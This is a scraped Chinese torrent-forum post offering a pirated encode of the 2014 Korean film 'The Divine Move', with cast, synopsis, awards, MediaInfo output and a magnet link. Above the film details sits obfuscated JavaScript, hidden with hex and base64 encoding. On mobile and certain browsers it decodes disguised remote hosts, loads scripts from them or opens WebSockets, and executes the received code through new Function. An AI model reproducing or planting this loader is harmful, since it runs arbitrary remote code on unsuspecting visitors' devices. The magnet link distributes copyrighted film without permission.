神之一手[中文字幕].The.Divine.Move.2014.1080p.BluRay.x265.10bit.DTS 7.03GB

版主小s 24天前 507

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 神之一手 / 棋神 / 神的一步 / The Divine Move / God's One Move
◎片  名 ?? ? ?
◎年  代 2014
◎产  地 韩国
◎类  别 动作 / 犯罪
◎语  言 韩语
◎上映日期 2014-07-03(韩国)
◎IMDb链接 https://www.imdb.com/title/tt3419894/
◎豆瓣评分 6.9/10 (14146人评价)
◎豆瓣链接 https://movie.douban.com/subject/24756658/
◎片  长 118分钟
◎导  演 赵范九 Beom-gu Cho (id:1343427)
◎编  剧 刘圣叶 Sung-Hyub Yu (id:1359477)
◎演  员 郑雨盛 Woo-sung Jung (id:1032365)
       安圣基 Sung-kee Ahn (id:1058705)
       李是英 Si-young Lee (id:1315572)
       安吉江 Kil-Kang Ahn (id:1340269)
       崔振赫 Jin-Hyeok Choi (id:1315531)
       金仁权 In-kwon Kim (id:1006493)
       李凡秀 Beom-su Lee (id:1217106)
       郑海钧 Hae-kyun Jung (id:1359476)
       安瑞贤 Seo-Hyun An (id:1318722)
       裴晟祐 Sung-Woo Bae (id:1350654)
       洪成德 Sung-duk Hong (id:1379535)
       朴智勋 Park Ji-hoon (id:1383729)
       金明秀 Myeong-su Kim (id:1373923)
       金弘波 Hong-Fa Kim (id:1353736)
       李昊延 Ho-yeon Lee (id:1455850)
       柳淳哲 Sun-cheol Yu (id:1373553)
       金素真 So-Jin Kim (id:1348190)
       李涛景 To-Jeong  Lee (id:1359478)
       黄春河 Chun-ha Hwang (id:1458258)
       张赫镇 Hyukjin Chang (id:1452266)

◎标  签 韩国 / 动作 / 犯罪 / 围棋 / 暴力 / 黑帮 / 2014 / 复仇

◎简  介
  时运不济的专业围棋选手宋泰锡(郑雨盛 饰)受沉湎于赌博的哥哥所托,帮助其在围棋赌局上出老千,结果被对方看破,哥哥遭受毒打后惨死,泰锡也被投入监牢。在狱中他利用棋艺从牢头处获得许多利益,更分别跟随神秘高手和黑帮老大锻炼出高超棋艺和强壮体魄。重获自由后,泰锡乔装打扮化名大石,并网罗了身处底层的宫秀、主(安圣基 饰)、许木匠等人组成各逞所能的团伙,发誓要向残害了他们兄弟的吴社长(李凡秀 饰)及其围棋诈骗团伙展开复仇。而狡诈凶残的吴社长绝不会轻易束手就擒,先失一着的他迅速展开反扑。                                    
                                决定命运的神之一手,一旦得到便有机会从地狱回到天堂,而这一切必将以血为代价……

◎获奖情况 (共8项)
  第35届韩国电影青龙奖 (2014)
  最佳男主角(提名)
   └──郑雨盛 (id:1032365)
  最佳新人男演员(提名)
   └──崔振赫 (id:1315531)
  最佳剪辑(提名)
  技术奖(提名)

  第51届韩国电影大钟奖 (2014)
  最佳男主角(提名)
   └──郑雨盛 (id:1032365)
  最佳男配角(提名)
   └──金仁权 (id:1006493)
  最佳新人男演员(提名)
   └──崔振赫 (id:1315531)
  最佳剪辑(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 322911338200839953075763420752727058351 (0xF2EE7628F2A8AD87D86E9BBB6F6127AF)

  4. Complete name                            : [email protected]M.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 7.03 GiB

  8. Duration                                 : 1 h 57 min

  9. Overall bit rate                         : 8 547 kb/s

  10. Encoded date                             : UTC 2021-08-29 09:31:43

  11. Writing application                      : mkvmerge v60.0.0 ('Are We Copies?') 64-bit

  12. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4


  13. Video

  14. ID                                       : 1

  15. Format                                   : HEVC

  16. Format/Info                              : High Efficiency Video Coding

  17. Format profile                           : Main [email protected]@Main

  18. Codec ID                                 : V_MPEGH/ISO/HEVC

  19. Duration                                 : 1 h 57 min

  20. Bit rate                                 : 7 006 kb/s

  21. Width                                    : 1 916 pixels

  22. Height                                   : 804 pixels

  23. Display aspect ratio                     : 2.40:1

  24. Frame rate mode                          : Constant

  25. Frame rate                               : 23.976 (24000/1001/53354) FPS

  26. Color space                              : YUV

  27. Chroma subsampling                       : 4:2:0

  28. Bit depth                                : 10 bits

  29. Bits/(Pixel*Frame)                       : 0.190

  30. Stream size                              : 5.76 GiB (82%)

  31. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  32. Encoding settings                        : rc=crf / crf=17.0000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.80 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1916x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  33. Default                                  : Yes

  34. Forced                                   : No


  35. Audio

  36. ID                                       : 2

  37. ID in the original source medium         : 4352 (0x1100)

  38. Format                                   : DTS

  39. Format/Info                              : Digital Theater Systems

  40. Codec ID                                 : A_DTS

  41. Duration                                 : 1 h 57 min

  42. Bit rate mode                            : Constant

  43. Bit rate                                 : 1 509 kb/s

  44. Channel(s)                               : 6 channels

  45. Channel layout                           : C L R Ls Rs LFE

  46. Sampling rate                            : 48.0 kHz

  47. Frame rate                               : 93.750 FPS (512 SPF)

  48. Bit depth                                : 16 bits

  49. Compression mode                         : Lossy

  50. Stream size                              : 1.24 GiB (18%)

  51. Language                                 : Korean

  52. Default                                  : Yes

  53. Forced                                   : No

  54. Original source medium                   : Blu-ray


  55. Text #1

  56. ID                                       : 3

  57. ID in the original source medium         : 4610 (0x1202)

  58. Format                                   : PGS

  59. Muxing mode                              : zlib

  60. Codec ID                                 : S_HDMV/PGS

  61. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration                                 : 1 h 53 min

  63. Bit rate                                 : 17.3 kb/s

  64. Count of elements                        : 2299

  65. Stream size                              : 14.0 MiB (0%)

  66. Title                                    : chs

  67. Language                                 : Chinese

  68. Default                                  : Yes

  69. Forced                                   : No

  70. Original source medium                   : Blu-ray


  71. Text #2

  72. ID                                       : 4

  73. ID in the original source medium         : 4611 (0x1203)

  74. Format                                   : PGS

  75. Muxing mode                              : zlib

  76. Codec ID                                 : S_HDMV/PGS

  77. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  78. Duration                                 : 1 h 53 min

  79. Bit rate                                 : 17.5 kb/s

  80. Count of elements                        : 2299

  81. Stream size                              : 14.2 MiB (0%)

  82. Title                                    : cht

  83. Language                                 : Chinese

  84. Default                                  : No

  85. Forced                                   : No

  86. Original source medium                   : Blu-ray


  87. Text #3

  88. ID                                       : 5

  89. ID in the original source medium         : 4608 (0x1200)

  90. Format                                   : PGS

  91. Muxing mode                              : zlib

  92. Codec ID                                 : S_HDMV/PGS

  93. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  94. Duration                                 : 1 h 54 min

  95. Bit rate                                 : 32.9 kb/s

  96. Count of elements                        : 1860

  97. Stream size                              : 26.9 MiB (0%)

  98. Title                                    : eng

  99. Language                                 : English

  100. Default                                  : No

  101. Forced                                   : No

  102. Original source medium                   : Blu-ray


  103. Menu

  104. 00:00:00.000                             : Chapter 01

  105. 00:03:36.758                             : Chapter 02

  106. 00:12:03.847                             : Chapter 03

  107. 00:20:33.105                             : Chapter 04

  108. 00:35:33.255                             : Chapter 05

  109. 00:45:32.938                             : Chapter 06

  110. 00:51:32.588                             : Chapter 07

  111. 00:58:36.179                             : Chapter 08

  112. 01:04:33.202                             : Chapter 09

  113. 01:12:59.750                             : Chapter 10

  114. 01:18:00.676                             : Chapter 11

  115. 01:26:56.167                             : Chapter 12

  116. 01:34:04.387                             : Chapter 13

  117. 01:39:27.002                             : Chapter 14

  118. 01:50:45.471                             : Chapter 15

  119. 01:53:52.492                             : Chapter 16



TAGS 动作 犯罪

磁力链:
  • magnet:?xt=urn:btih:7144AA22BFBD5E1280255700BDB892613307CD50
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回